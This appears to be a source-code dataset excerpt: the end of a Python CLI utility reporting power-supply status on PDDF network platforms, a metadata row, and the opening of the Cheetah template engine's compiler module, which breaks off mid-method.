    """SysFS dump for PSU *idx*.

    NOTE(review): unlike the other wrappers this passes *idx* unadjusted
    (callers supply 0-based indices here), and the legacy fallback ignores
    *idx* entirely — confirm intended.
    """
    if platform_chassis is None:
        return platform_psuutil.dump_sysfs()
    try:
        return platform_chassis.get_psu(idx).dump_sysfs()
    except NotImplementedError:
        return platform_psuutil.dump_sysfs()
# ==================== CLI commands and groups ====================
# This is our main entrypoint - the main 'psuutil' command
@click.group()
def cli():
    """psuutil - Command line utility for providing PSU status"""
    global platform_psuutil
    global platform_chassis

    # Root privileges are required: the platform plugins access hardware paths.
    if os.geteuid() != 0:
        click.echo("Root privileges are required for this operation")
        sys.exit(1)

    # Load the helper class
    helper = UtilHelper()

    # This utility only runs on platforms with PDDF support enabled.
    if not helper.check_pddf_mode():
        click.echo("PDDF mode should be supported and enabled for this platform for this operation")
        sys.exit(1)

    # Load new platform api class (2.0); on failure fall through to 1.0 below
    try:
        import sonic_platform.platform
        platform_chassis = sonic_platform.platform.Platform().get_chassis()
    except Exception as e:
        click.echo("Failed to load chassis due to {}".format(str(e)))

    # Load platform-specific psuutil class if 2.0 implementation is not present
    if platform_chassis is None:
        try:
            platform_psuutil = helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
        except Exception as e:
            click.echo("Failed to load {}: {}".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))
            sys.exit(2)
# 'version' subcommand
@cli.command()
def version():
    """Display version info"""
    version_msg = "PDDF psuutil version {0}".format(VERSION)
    click.echo(version_msg)
# 'numpsus' subcommand
@cli.command()
def numpsus():
    """Display number of supported PSUs on device"""
    psu_count = _wrapper_get_num_psus()
    click.echo(psu_count)
# 'status' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def status(index):
    """Display PSU status"""
    # PSU numbering is 1-based; a negative index selects every PSU.
    supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
    psu_ids = supported_psu if index < 0 else [index]

    header = ['PSU', 'Status']
    status_table = []
    for psu in psu_ids:
        psu_name = _wrapper_get_psu_name(psu)
        if psu not in supported_psu:
            click.echo("Error! The {} is not available on the platform.\n"
                       "Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
            continue
        if _wrapper_get_psu_presence(psu):
            msg = 'OK' if _wrapper_get_psu_status(psu) else "NOT OK"
        else:
            msg = 'NOT PRESENT'
        status_table.append([psu_name, msg])

    if status_table:
        click.echo(tabulate(status_table, header, tablefmt="simple"))
# 'mfrinfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def mfrinfo(index):
    """Display PSU manufacturer info"""
    # PSU numbering is 1-based; a negative index selects every PSU.
    supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
    psu_ids = supported_psu if index < 0 else [index]

    for psu in psu_ids:
        psu_name = _wrapper_get_psu_name(psu)
        if psu not in supported_psu:
            click.echo("Error! The {} is not available on the platform.\n"
                       "Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
            continue
        if not _wrapper_get_psu_status(psu):
            click.echo("{} is Not OK\n".format(psu_name))
            continue

        # Gather manufacturer details from whichever API layer is active.
        model_name = _wrapper_get_psu_model(psu)
        mfr_id = _wrapper_get_psu_mfr_id(psu)
        serial_num = _wrapper_get_psu_serial(psu)
        airflow_dir = _wrapper_get_psu_direction(psu)

        click.echo("{} is OK\nManufacture Id: {}\n"
                   "Model: {}\nSerial Number: {}\n"
                   "Fan Direction: {}\n".format(psu_name, mfr_id, model_name,
                                                serial_num, airflow_dir.capitalize()))
# 'seninfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def seninfo(index):
    """Display PSU sensor info"""
    # PSU numbering is 1-based; a negative index selects every PSU.
    supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
    psu_ids = supported_psu if index < 0 else [index]

    for psu in psu_ids:
        psu_name = _wrapper_get_psu_name(psu)
        if psu not in supported_psu:
            click.echo("Error! The {} is not available on the platform.\n"
                       "Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
            continue
        if not _wrapper_get_psu_status(psu):
            click.echo("{} is Not OK\n".format(psu_name))
            continue

        # Scale V/A/W readings to mv/ma/mw for display.
        millivolts = _wrapper_get_output_voltage(psu) * 1000
        milliamps = _wrapper_get_output_current(psu) * 1000
        milliwatts = _wrapper_get_output_power(psu) * 1000
        fan1_speed = _wrapper_get_fan_rpm(psu, 1)

        click.echo("{} is OK\nOutput Voltage: {} mv\n"
                   "Output Current: {} ma\nOutput Power: {} mw\n"
                   "Fan1 Speed: {} rpm\n".format(psu_name, millivolts, milliamps,
                                                 milliwatts, fan1_speed))
@cli.group()
def debug():
    """pddf_psuutil debug commands"""
    # Container group only; the work happens in subcommands (dump_sysfs).
    pass
@debug.command()
def dump_sysfs():
    """Dump all PSU related SysFS paths"""
    # NOTE(review): iteration is 0-based here, matching _wrapper_dump_sysfs.
    for psu_index in range(_wrapper_get_num_psus()):
        sysfs_paths = _wrapper_dump_sysfs(psu_index)
        if not sysfs_paths:
            continue
        for path in sysfs_paths:
            click.echo(path)
# Script entry point: dispatch to the click command group.
if __name__ == '__main__':
    cli()
| 31.05 | 117 | 0.646914 | 1,221 | 9,315 | 4.665029 | 0.143325 | 0.05618 | 0.041081 | 0.046699 | 0.541784 | 0.495611 | 0.481566 | 0.409586 | 0.347261 | 0.333567 | 0 | 0.0079 | 0.252603 | 9,315 | 299 | 118 | 31.153846 | 0.810256 | 0.089748 | 0 | 0.495536 | 0 | 0 | 0.097019 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0.0625 | 0.035714 | 0 | 0.245536 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4669e171fec58193272f58bd7b305ba7d5f7aed0 | 78,232 | py | Python | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 83 | 2017-03-15T12:43:25.000Z | 2022-03-31T12:38:44.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 18 | 2017-03-20T14:12:58.000Z | 2021-07-28T09:11:55.000Z | lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 42ca5de66fcda21ef6a4040bade99118b2ad6374 | [
"MIT"
] | 25 | 2017-04-01T01:40:02.000Z | 2022-02-20T11:08:12.000Z | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
class Error(Exception): pass
# Default settings consumed by the Compiler classes (several keys are also
# read by the Parser, as noted below).  Grouped by concern.
DEFAULT_COMPILER_SETTINGS = {
    ## controlling the handling of Cheetah $placeholders
    'useNameMapper': True,      # Unified dotted notation and the searchList
    'useSearchList': True,      # if false, assume the first
                                # portion of the $variable (before the first dot) is a global,
                                # builtin, or local var that doesn't need
                                # looking up in the searchlist BUT use
                                # namemapper on the rest of the lookup
    'allowSearchListAsMethArg': True,
    'useAutocalling': True,     # detect and call callable()'s, requires NameMapper
    'useStackFrames': True,     # use NameMapper.valueFromFrameOrSearchList
                                # rather than NameMapper.valueFromSearchList
    'useErrorCatcher':False,
    'alwaysFilterNone':True,    # filter out None, before the filter is called
    'useFilters':True,          # use str instead if =False
    'includeRawExprInFilterArgs':True,
    #'lookForTransactionAttr':False,
    'autoAssignDummyTransactionToSelf':False,
    'useKWsDictArgForPassingTrans':True,

    ## controlling the aesthetic appearance / behaviour of generated code
    'commentOffset': 1,
    # should shorter str constant chunks be printed using repr rather than ''' quotes
    'reprShortStrConstants': True,
    'reprNewlineThreshold':3,
    'outputRowColComments':True,
    # should #block's be wrapped in a comment in the template's output
    'includeBlockMarkers': False,
    'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
    'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
    'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
    'setup__str__method': False,
    'mainMethodName':'respond',
    'mainMethodNameForSubclasses':'writeBody',
    'indentationStep': ' '*4,
    'initialMethIndentLevel': 2,
    'monitorSrcFile':False,
    'outputMethodsBeforeAttributes': True,

    ## customizing the #extends directive
    'autoImportForExtendsDirective':True,
    'handlerForExtendsDirective':None,  # baseClassName = handler(compiler, baseClassName)
                                        # a callback hook for customizing the
                                        # #extends directive. It can manipulate
                                        # the compiler's state if needed.
                                        # also see allowExpressionsInExtendsDirective

    # input filtering/restriction
    # use lower case keys here!!
    'disabledDirectives':[],        # list of directive keys, without the start token
    'enabledDirectives':[],         # list of directive keys, without the start token

    'disabledDirectiveHooks':[],    # callable(parser, directiveKey)
    'preparseDirectiveHooks':[],    # callable(parser, directiveKey)
    'postparseDirectiveHooks':[],   # callable(parser, directiveKey)
    'preparsePlaceholderHooks':[],  # callable(parser)
    'postparsePlaceholderHooks':[], # callable(parser)
    # the above hooks don't need to return anything

    'expressionFilterHooks':[],     # callable(parser, expr, exprType, rawExpr=None, startPos=None)
    # exprType is the name of the directive, 'psp', or 'placeholder'. all
    # lowercase. The filters *must* return the expr or raise an exception.
    # They can modify the expr if needed.

    'templateMetaclass':None,   # strictly optional. Only works with new-style baseclasses

    'i18NFunctionName':'self.i18n',

    ## These are used in the parser, but I've put them here for the time being to
    ## facilitate separating the parser and compiler:
    'cheetahVarStartToken':'$',
    'commentStartToken':'##',
    'multiLineCommentStartToken':'#*',
    'multiLineCommentEndToken':'*#',
    'gobbleWhitespaceAroundMultiLineComments':True,
    'directiveStartToken':'#',
    'directiveEndToken':'#',
    'allowWhitespaceAfterDirectiveStartToken':False,
    'PSPStartToken':'<%',
    'PSPEndToken':'%>',
    'EOLSlurpToken':'#',
    'gettextTokens': ["_", "N_", "ngettext"],
    'allowExpressionsInExtendsDirective': False,  # the default restricts it to
                                                  # accepting dotted names
    'allowEmptySingleLineMethods': False,
    'allowNestedDefScopes': True,
    'allowPlaceholderFilterArgs': True,

    ## See Parser.initDirectives() for the use of the next 3
    #'directiveNamesAndParsers':{}
    #'endDirectiveNamesAndHandlers':{}
    #'macroDirectives':{}
    }
class GenUtils:
    """An abstract baseclass for the Compiler classes that provides methods that
    perform generic utility functions or generate pieces of output code from
    information passed in by the Parser baseclass. These methods don't do any
    parsing themselves.
    """

    def genTimeInterval(self, timeString):
        """Convert a time string with an optional unit suffix into seconds.

        Suffixes: 's' seconds, 'm' minutes, 'h' hours, 'd' days, 'w' weeks;
        a bare number defaults to minutes.
        """
        ##@@ TR: need to add some error handling here
        if timeString[-1] == 's':
            interval = float(timeString[:-1])
        elif timeString[-1] == 'm':
            interval = float(timeString[:-1])*60
        elif timeString[-1] == 'h':
            interval = float(timeString[:-1])*60*60
        elif timeString[-1] == 'd':
            interval = float(timeString[:-1])*60*60*24
        elif timeString[-1] == 'w':
            interval = float(timeString[:-1])*60*60*24*7
        else: # default to minutes
            interval = float(timeString)*60
        return interval

    def genCacheInfo(self, cacheTokenParts):
        """Decipher a placeholder cachetoken
        """
        cacheInfo = {}
        if cacheTokenParts['REFRESH_CACHE']:
            cacheInfo['type'] = REFRESH_CACHE
            cacheInfo['interval'] = self.genTimeInterval(cacheTokenParts['interval'])
        elif cacheTokenParts['STATIC_CACHE']:
            cacheInfo['type'] = STATIC_CACHE
        return cacheInfo # is empty if no cache

    def genCacheInfoFromArgList(self, argList):
        """Build a REFRESH_CACHE cacheInfo dict from #cache directive args.

        argList is a sequence of (key, value) pairs; quoted values are
        unquoted, and 'timer' is normalized to an 'interval' in seconds.
        """
        cacheInfo = {'type':REFRESH_CACHE}
        for key, val in argList:
            if val[0] in '"\'':
                val = val[1:-1]

            if key == 'timer':
                key = 'interval'
                val = self.genTimeInterval(val)

            cacheInfo[key] = val
        return cacheInfo

    def genCheetahVar(self, nameChunks, plain=False):
        """Generate the Python code for a Cheetah $var, dispatching between the
        NameMapper-based and plain-Python forms based on settings/`plain`."""
        # gettext tokens (e.g. _, N_) get a side-effect marker so that string
        # extraction tools can find them in the compiled output.
        if nameChunks[0][0] in self.setting('gettextTokens'):
            self.addGetTextVar(nameChunks)
        if self.setting('useNameMapper') and not plain:
            return self.genNameMapperVar(nameChunks)
        else:
            return self.genPlainVar(nameChunks)

    def addGetTextVar(self, nameChunks):
        """Output something that gettext can recognize.

        This is a harmless side effect necessary to make gettext work when it
        is scanning compiled templates for strings marked for translation.

        @@TR: another marginally more efficient approach would be to put the
        output in a dummy method that is never called.
        """
        # @@TR: this should be in the compiler not here
        self.addChunk("if False:")
        self.indent()
        # genPlainVar destroys its argument, so pass a copy.
        self.addChunk(self.genPlainVar(nameChunks[:]))
        self.dedent()

    def genPlainVar(self, nameChunks):
        """Generate Python code for a Cheetah $var without using NameMapper
        (Unified Dotted Notation with the SearchList).

        NOTE: consumes (empties) the nameChunks list passed in.
        """
        nameChunks.reverse()
        chunk = nameChunks.pop()
        pythonCode = chunk[0] + chunk[2]
        while nameChunks:
            chunk = nameChunks.pop()
            pythonCode = (pythonCode + '.' + chunk[0] + chunk[2])
        return pythonCode

    def genNameMapperVar(self, nameChunks):
        """Generate valid Python code for a Cheetah $var, using NameMapper
        (Unified Dotted Notation with the SearchList).

        nameChunks = list of var subcomponents represented as tuples
          [ (name,useAC,remainderOfExpr),
          ]
        where:
          name = the dotted name base
          useAC = where NameMapper should use autocalling on namemapperPart
          remainderOfExpr = any arglist, index, or slice

        If remainderOfExpr contains a call arglist (e.g. '(1234)') then useAC
        is False, otherwise it defaults to True. It is overridden by the global
        setting 'useAutocalling' if this setting is False.

        EXAMPLE
        ------------------------------------------------------------------------
        if the raw Cheetah Var is
          $a.b.c[1].d().x.y.z

        nameChunks is the list
          [ ('a.b.c',True,'[1]'), # A
            ('d',False,'()'),     # B
            ('x.y.z',True,''),    # C
          ]

        When this method is fed the list above it returns
          VFN(VFN(VFFSL(SL, 'a.b.c',True)[1], 'd',False)(), 'x.y.z',True)
        which can be represented as
          VFN(B`, name=C[0], executeCallables=(useAC and C[1]))C[2]
        where:
          VFN = NameMapper.valueForName
          VFFSL = NameMapper.valueFromFrameOrSearchList
          VFSL = NameMapper.valueFromSearchList # optionally used instead of VFFSL
          SL = self.searchList()
          useAC = self.setting('useAutocalling') # True in this example

          A = ('a.b.c',True,'[1]')
          B = ('d',False,'()')
          C = ('x.y.z',True,'')

          C` = VFN( VFN( VFFSL(SL, 'a.b.c',True)[1],
                         'd',False)(),
                    'x.y.z',True)
             = VFN(B`, name='x.y.z', executeCallables=True)

          B` = VFN(A`, name=B[0], executeCallables=(useAC and B[1]))B[2]
          A` = VFFSL(SL, name=A[0], executeCallables=(useAC and A[1]))A[2]

        Note, if the compiler setting useStackFrames=False (default is true)
        then
          A` = VFSL([locals()]+SL+[globals(), __builtin__], name=A[0], executeCallables=(useAC and A[1]))A[2]
        This option allows Cheetah to be used with Psyco, which doesn't support
        stack frame introspection.
        """
        defaultUseAC = self.setting('useAutocalling')
        useSearchList = self.setting('useSearchList')

        nameChunks.reverse()
        name, useAC, remainder = nameChunks.pop()

        if not useSearchList:
            # Treat the first dotted component as a plain Python name and only
            # use NameMapper for the rest of the lookup.
            firstDotIdx = name.find('.')
            if firstDotIdx != -1 and firstDotIdx < len(name):
                beforeFirstDot, afterDot = name[:firstDotIdx], name[firstDotIdx+1:]
                pythonCode = ('VFN(' + beforeFirstDot +
                              ',"' + afterDot +
                              '",' + repr(defaultUseAC and useAC) + ')'
                              + remainder)
            else:
                pythonCode = name+remainder
        elif self.setting('useStackFrames'):
            pythonCode = ('VFFSL(SL,'
                          '"'+ name + '",'
                          + repr(defaultUseAC and useAC) + ')'
                          + remainder)
        else:
            pythonCode = ('VFSL([locals()]+SL+[globals(), __builtin__],'
                          '"'+ name + '",'
                          + repr(defaultUseAC and useAC) + ')'
                          + remainder)
        ##
        while nameChunks:
            name, useAC, remainder = nameChunks.pop()
            pythonCode = ('VFN(' + pythonCode +
                          ',"' + name +
                          '",' + repr(defaultUseAC and useAC) + ')'
                          + remainder)
        return pythonCode
##################################################
## METHOD COMPILERS
class MethodCompiler(GenUtils):
    """Generates the Python source code for one method of a compiled template
    class.

    Output is accumulated as a list of code chunks (self._methodBodyChunks)
    plus a buffer of pending string constants; wrapCode() assembles the final
    method definition (signature + docstring + body).  The various add*()
    methods are called by the Parser as it encounters directives and
    placeholders.
    """

    def __init__(self, methodName, classCompiler,
                 initialMethodComment=None,
                 decorator=None):
        self._settingsManager = classCompiler
        self._classCompiler = classCompiler
        self._moduleCompiler = classCompiler._moduleCompiler
        self._methodName = methodName
        self._initialMethodComment = initialMethodComment
        self._setupState()
        self._decorator = decorator

    def setting(self, key):
        # Settings are delegated to the owning class compiler.
        return self._settingsManager.setting(key)

    def _setupState(self):
        # Per-method accumulation state; reset by __init__.
        self._indent = self.setting('indentationStep')
        self._indentLev = self.setting('initialMethIndentLevel')
        self._pendingStrConstChunks = []
        self._methodSignature = None
        self._methodDef = None
        self._docStringLines = []
        self._methodBodyChunks = []
        # Region stacks track nested #cache / #call / #capture / #filter blocks.
        self._cacheRegionsStack = []
        self._callRegionsStack = []
        self._captureRegionsStack = []
        self._filterRegionsStack = []
        self._isErrorCatcherOn = False
        self._hasReturnStatement = False
        self._isGenerator = False

    def cleanupState(self):
        """Called by the containing class compiler instance
        """
        pass

    def methodName(self):
        return self._methodName

    def setMethodName(self, name):
        self._methodName = name

    ## methods for managing indentation

    def indentation(self):
        return self._indent * self._indentLev

    def indent(self):
        self._indentLev +=1

    def dedent(self):
        if self._indentLev:
            self._indentLev -=1
        else:
            raise Error('Attempt to dedent when the indentLev is 0')

    ## methods for final code wrapping

    def methodDef(self):
        # Cached once wrapCode() has run.
        if self._methodDef:
            return self._methodDef
        else:
            return self.wrapCode()

    __str__ = methodDef

    def wrapCode(self):
        """Assemble and cache the complete method definition source."""
        self.commitStrConst()
        methodDefChunks = (
            self.methodSignature(),
            '\n',
            self.docString(),
            self.methodBody() )
        methodDef = ''.join(methodDefChunks)
        self._methodDef = methodDef
        return methodDef

    def methodSignature(self):
        return self._indent + self._methodSignature + ':'

    def setMethodSignature(self, signature):
        self._methodSignature = signature

    def methodBody(self):
        return ''.join( self._methodBodyChunks )

    def docString(self):
        """Render the accumulated docstring lines as a triple-quoted string,
        or '' if there are none."""
        if not self._docStringLines:
            return ''

        ind = self._indent*2
        # Embedded triple-double-quotes would break the generated docstring.
        docStr = (ind + '"""\n' + ind +
                  ('\n' + ind).join([ln.replace('"""',"'''") for ln in self._docStringLines]) +
                  '\n' + ind + '"""\n')
        return  docStr

    ## methods for adding code

    def addMethDocString(self, line):
        # Escape % so later %-formatting of the generated source is safe.
        self._docStringLines.append(line.replace('%','%%'))

    def addChunk(self, chunk):
        """Append one line of generated code at the current indent level."""
        self.commitStrConst()
        chunk = "\n" + self.indentation() + chunk
        self._methodBodyChunks.append(chunk)

    def appendToPrevChunk(self, appendage):
        self._methodBodyChunks[-1] = self._methodBodyChunks[-1] + appendage

    def addWriteChunk(self, chunk):
        self.addChunk('write(' + chunk + ')')

    def addFilteredChunk(self, chunk, filterArgs=None, rawExpr=None, lineCol=None):
        """Emit code that evaluates `chunk` and writes it through the current
        output filter, honoring the alwaysFilterNone/useFilters settings."""
        if filterArgs is None:
            filterArgs = ''
        if self.setting('includeRawExprInFilterArgs') and rawExpr:
            filterArgs += ', rawExpr=%s'%repr(rawExpr)

        if self.setting('alwaysFilterNone'):
            # Assign to a temp first so None can be filtered out before writing.
            if rawExpr and rawExpr.find('\n')==-1 and rawExpr.find('\r')==-1:
                self.addChunk("_v = %s # %r"%(chunk, rawExpr))
                if lineCol:
                    self.appendToPrevChunk(' on line %s, col %s'%lineCol)
            else:
                self.addChunk("_v = %s"%chunk)

            if self.setting('useFilters'):
                self.addChunk("if _v is not None: write(_filter(_v%s))"%filterArgs)
            else:
                self.addChunk("if _v is not None: write(str(_v))")
        else:
            if self.setting('useFilters'):
                self.addChunk("write(_filter(%s%s))"%(chunk,filterArgs))
            else:
                self.addChunk("write(str(%s))"%chunk)

    def _appendToPrevStrConst(self, strConst):
        if self._pendingStrConstChunks:
            self._pendingStrConstChunks.append(strConst)
        else:
            self._pendingStrConstChunks = [strConst]

    def _unescapeCheetahVars(self, theString):
        """Unescape any escaped Cheetah \$vars in the string.
        """
        token = self.setting('cheetahVarStartToken')
        return theString.replace('\\' + token, token)

    def _unescapeDirectives(self, theString):
        """Unescape any escaped Cheetah directive start tokens in the string.
        """
        token = self.setting('directiveStartToken')
        return theString.replace('\\' + token, token)

    def commitStrConst(self):
        """Add the code for outputting the pending strConst without chopping off
        any whitespace from it.
        """
        if self._pendingStrConstChunks:
            strConst = self._unescapeCheetahVars(''.join(self._pendingStrConstChunks))
            strConst = self._unescapeDirectives(strConst)
            self._pendingStrConstChunks = []
            if not strConst:
                return
            if self.setting('reprShortStrConstants') and \
               strConst.count('\n') < self.setting('reprNewlineThreshold'):
                self.addWriteChunk( repr(strConst).replace('\\012','\\n'))
            else:
                # Emit as a triple-quoted literal, escaping backslashes and
                # any quote characters that would terminate it prematurely.
                strConst = strConst.replace('\\','\\\\').replace("'''","'\'\'\'")
                if strConst[0] == "'":
                    strConst = '\\' + strConst
                if strConst[-1] == "'":
                    strConst = strConst[:-1] + '\\' + strConst[-1]
                self.addWriteChunk("'''" + strConst + "'''" )

    def handleWSBeforeDirective(self):
        """Truncate the pending strCont to the beginning of the current line.
        """
        if self._pendingStrConstChunks:
            src = self._pendingStrConstChunks[-1]
            BOL = max(src.rfind('\n')+1, src.rfind('\r')+1, 0)
            if BOL < len(src):
                self._pendingStrConstChunks[-1] = src[:BOL]

    def isErrorCatcherOn(self):
        return self._isErrorCatcherOn

    def turnErrorCatcherOn(self):
        self._isErrorCatcherOn = True

    def turnErrorCatcherOff(self):
        self._isErrorCatcherOn = False

    # @@TR: consider merging the next two methods into one
    def addStrConst(self, strConst):
        self._appendToPrevStrConst(strConst)

    def addRawText(self, text):
        self.addStrConst(text)

    def addMethComment(self, comm):
        offSet = self.setting('commentOffset')
        self.addChunk('#' + ' '*offSet + comm)

    def addPlaceholder(self, expr, filterArgs, rawPlaceholder,
                       cacheTokenParts, lineCol,
                       silentMode=False):
        """Emit code for a $placeholder, optionally wrapped in a cache region,
        error-catcher call, or (silentMode) a try/except NotFound guard."""
        cacheInfo = self.genCacheInfo(cacheTokenParts)
        if cacheInfo:
            cacheInfo['ID'] = repr(rawPlaceholder)[1:-1]
            self.startCacheRegion(cacheInfo, lineCol, rawPlaceholder=rawPlaceholder)

        if self.isErrorCatcherOn():
            methodName = self._classCompiler.addErrorCatcherCall(
                expr, rawCode=rawPlaceholder, lineCol=lineCol)
            expr = 'self.' + methodName + '(localsDict=locals())'

        if silentMode:
            self.addChunk('try:')
            self.indent()
            self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
            self.dedent()
            self.addChunk('except NotFound: pass')
        else:
            self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)

        if self.setting('outputRowColComments'):
            self.appendToPrevChunk(' # from line %s, col %s' % lineCol + '.')
        if cacheInfo:
            self.endCacheRegion()

    def addSilent(self, expr):
        self.addChunk( expr )

    def addEcho(self, expr, rawExpr=None):
        self.addFilteredChunk(expr, rawExpr=rawExpr)

    def addSet(self, expr, exprComponents, setStyle):
        """Emit code for a #set directive; SET_GLOBAL rewrites the LVALUE to
        go through self._CHEETAH__globalSetVars, SET_MODULE targets the module
        namespace."""
        if setStyle is SET_GLOBAL:
            (LVALUE, OP, RVALUE) = (exprComponents.LVALUE,
                                    exprComponents.OP,
                                    exprComponents.RVALUE)
            # we need to split the LVALUE to deal with globalSetVars
            splitPos1 = LVALUE.find('.')
            splitPos2 = LVALUE.find('[')
            if splitPos1 > 0 and splitPos2==-1:
                splitPos = splitPos1
            elif splitPos1 > 0 and splitPos1 < max(splitPos2,0):
                splitPos = splitPos1
            else:
                splitPos = splitPos2

            if splitPos >0:
                primary = LVALUE[:splitPos]
                secondary = LVALUE[splitPos:]
            else:
                primary = LVALUE
                secondary = ''
            LVALUE = 'self._CHEETAH__globalSetVars["' + primary + '"]' + secondary
            expr = LVALUE + ' ' + OP + ' ' + RVALUE.strip()

        if setStyle is SET_MODULE:
            self._moduleCompiler.addModuleGlobal(expr)
        else:
            self.addChunk(expr)

    def addInclude(self, sourceExpr, includeFrom, isRaw):
        self.addChunk('self._handleCheetahInclude(' + sourceExpr +
                      ', trans=trans, ' +
                      'includeFrom="' + includeFrom + '", raw=' +
                      repr(isRaw) + ')')

    def addWhile(self, expr, lineCol=None):
        self.addIndentingDirective(expr, lineCol=lineCol)

    def addFor(self, expr, lineCol=None):
        self.addIndentingDirective(expr, lineCol=lineCol)

    def addRepeat(self, expr, lineCol=None):
        #the _repeatCount stuff here allows nesting of #repeat directives
        self._repeatCount = getattr(self, "_repeatCount", -1) + 1
        self.addFor('for __i%s in range(%s)' % (self._repeatCount,expr), lineCol=lineCol)

    def addIndentingDirective(self, expr, lineCol=None):
        """Emit a block-opening statement (appending ':' if needed) and
        increase the generated-code indent level."""
        if expr and not expr[-1] == ':':
            expr = expr  + ':'
        self.addChunk( expr )
        if lineCol:
            self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
        self.indent()

    def addReIndentingDirective(self, expr, dedent=True, lineCol=None):
        """Like addIndentingDirective, but first dedents (for else/elif/
        except/finally clauses that close the preceding suite)."""
        self.commitStrConst()
        if dedent:
            self.dedent()
        if not expr[-1] == ':':
            expr = expr + ':'

        self.addChunk( expr )
        if lineCol:
            self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
        self.indent()

    def addIf(self, expr, lineCol=None):
        """For a full #if ... #end if directive
        """
        self.addIndentingDirective(expr, lineCol=lineCol)

    def addOneLineIf(self, expr, lineCol=None):
        """For a single-line #if directive (same generated code as a full
        #if block).
        """
        self.addIndentingDirective(expr, lineCol=lineCol)

    def addTernaryExpr(self, conditionExpr, trueExpr, falseExpr, lineCol=None):
        """For a single-line #if ... then .... else ... directive
        <condition> then <trueExpr> else <falseExpr>
        """
        self.addIndentingDirective(conditionExpr, lineCol=lineCol)
        self.addFilteredChunk(trueExpr)
        self.dedent()
        self.addIndentingDirective('else')
        self.addFilteredChunk(falseExpr)
        self.dedent()

    def addElse(self, expr, dedent=True, lineCol=None):
        expr = re.sub(r'else[ \f\t]+if','elif', expr)
        self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)

    def addElif(self, expr, dedent=True, lineCol=None):
        self.addElse(expr, dedent=dedent, lineCol=lineCol)

    def addUnless(self, expr, lineCol=None):
        self.addIf('if not (' + expr + ')')

    def addClosure(self, functionName, argsList, parserComment):
        """Emit a nested 'def' for a #closure/#def-style local function."""
        argStringChunks = []
        for arg in argsList:
            chunk = arg[0]
            if not arg[1] == None:
                chunk += '=' + arg[1]
            argStringChunks.append(chunk)
        signature = "def " + functionName + "(" + ','.join(argStringChunks) + "):"
        self.addIndentingDirective(signature)
        self.addChunk('#'+parserComment)

    def addTry(self, expr, lineCol=None):
        self.addIndentingDirective(expr, lineCol=lineCol)

    def addExcept(self, expr, dedent=True, lineCol=None):
        self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)

    def addFinally(self, expr, dedent=True, lineCol=None):
        self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)

    def addReturn(self, expr):
        # A method cannot both return and yield.
        assert not self._isGenerator
        self.addChunk(expr)
        self._hasReturnStatement = True

    def addYield(self, expr):
        """Emit a yield; a bare 'yield' gets expanded to yield the buffered
        transaction output and reset the buffer."""
        assert not self._hasReturnStatement
        self._isGenerator = True
        if expr.replace('yield','').strip():
            self.addChunk(expr)
        else:
            self.addChunk('if _dummyTrans:')
            self.indent()
            self.addChunk('yield trans.response().getvalue()')
            self.addChunk('trans = DummyTransaction()')
            self.addChunk('write = trans.response().write')
            self.dedent()
            self.addChunk('else:')
            self.indent()
